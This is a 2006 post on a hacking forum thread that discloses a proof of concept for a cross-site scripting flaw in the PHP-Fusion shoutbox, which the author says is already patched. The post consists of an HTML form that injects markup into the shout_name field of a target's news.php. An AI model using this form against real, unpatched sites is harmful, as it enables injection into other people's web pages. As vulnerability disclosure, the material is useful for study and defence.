Follow us on Twitter!
The important thing is not to stop questioning. - Albert Einstein
Sunday, May 03, 2015
Navigation
Home
HellBoundHackers Main:
HellBoundHackers Find:
HellBoundHackers Information:
Learn
Communicate
Submit
Shop
Challenges
HellBoundHackers Exploit:
HellBoundHackers Programming:
HellBoundHackers Think:
HellBoundHackers Track:
HellBoundHackers Patch:
HellBoundHackers Other:
HellBoundHackers Need Help?
Other
Members Online
Total Online: 31
Guests Online: 28
TeamSpeak Online : 5 Members Online: 3

Registered Members: 88165
Newest Member: Pippin2026
Latest Articles
Our sponsor needs your help!


One of our sponsors needs your help, http://www.virginmediabusiness.co.uk/pitch-to-rich/grow/krystal-hosting/
Go check out their video and Don't forget to vote !


~ Thanks for your help
HBH
View Thread

HellBound Hackers | Computer General | Web hacking

Author

PHP-Fusion XSS POC


Member

Your avatar

Posts:
Location:
Joined: 01.01.70
Rank:
Guest
Posted on 24-08-06 05:58
This is already patched and was a 0day for 4 days about 5 months ago :P but no one ever released the POC. So heres the adv. and the POC.

http://www.frsirt. . ./2006/0463

POC
------------
Strait HTMl believe it or not.
Code
<div align='center'><form action='http://www.site.com/news.php' method='POST'><input name='shout_name' value="<a href='#'>name</a>" maxlength='900' style='width:100%;'><br><textarea name='shout_message' rows='4' style='width:140px;'></textarea></br><input type='submit' name='post_shout' value='Attack'></form></div>









Edited by on 24-08-06 06:01